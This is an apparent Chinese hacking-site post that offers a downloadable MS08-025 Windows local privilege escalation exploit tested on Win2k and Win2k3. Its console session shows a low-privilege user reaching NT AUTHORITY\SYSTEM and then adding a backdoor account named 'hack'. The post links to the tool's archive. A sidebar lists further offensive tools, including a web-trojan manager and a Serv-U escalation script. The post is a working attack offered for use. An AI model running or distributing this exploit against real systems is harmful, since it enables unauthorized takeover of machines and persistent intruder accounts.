|
[图文]MS08-025 for win2k & win2k3(系统溢出工具)
Win2k CN SP2 ,Win2k3 CN SP1下测试通过,其它未测试
D:\>whoami
BAICKER-VMWARE\009
D:\>net user hack /add
系统发生 5 错误。
拒绝访问。
D:\>ms08025 whoami
MS08-025 Windows Local Privilege Escalation Vulnerability Exploit
By 009, baicker@hotmail.com
TEST OS: WINDOWS 2k SP2 & WINDOWS 2k3 CN SP1
Kernel is \WINNT\System32\ntoskrnl.exe
Get KernelBase Success, ntoskrnl.exe base = 80400000
Mapping ntoskrnl.exe … ok
KeServiceDescriptorTable = 008ED280
Find KiServiceTable … Get ZwVdmControl Number … ok!
ZwVdmControl Call Number: 000000E8
HookAddress: 80473CB8
[+] Executing Shellcode…
NT AUTHORITY\SYSTEM
D:\>ms08025 “net user hack /add”
MS08-025 Windows Local Privilege Escalation Vulnerability Exploit
By 009, baicker@hotmail.com
TEST OS: WINDOWS 2k3 CN SP1
Kernel is \WINNT\System32\ntoskrnl.exe
Get KernelBase Success, ntoskrnl.exe base = 80400000
Mapping ntoskrnl.exe … ok
KeServiceDescriptorTable = 008ED280
Find KiServiceTable … Get ZwVdmControl Number … ok!
ZwVdmControl Call Number: 000000E8
HookAddress: 80473CB8
[+] Executing Shellcode…
D:\>命令成功完成。
D:\>net user
\\BAICKER-VMWARE 的用户帐户
——————————————————————————-
009 Administrator Guest
hack IUSR_BAICKER-VMWARE IWAM_BAICKER-VMWARE
TsInternetUser
命令成功完成。
D:\>
工具下载
http://www.blogjava.net/Files/baicker/ms08025.rar
| Real Player rmoc3260.dll Activ | 04-04 |
| Real Player rmoc3260.dll Activ | 04-03 |
| Pangolin号称很牛的注入工具 | 03-25 |
| 仿FirePack网马管理系统fsploit | 03-01 |
| 机器狗生成器 | 02-26 |
| Serv-U 6.X 提权脚本 | 01-31 |
| 入侵工具Knark的分析及防范 | 01-14 |
| 如何使用Nikto漏洞扫描工具检测网 | 12-21 |
| 十三WEBSHELL终结版后门的去除过 | 12-14 |
| hijack(红狼安全小组原创作品 - | 11-29 |
| 高级内网渗透工具:Paris (创建VP | 11-01 |
| AntiARP-DNS Ver:3.6.4 绿色美化 | 10-15 |
您现在的位置: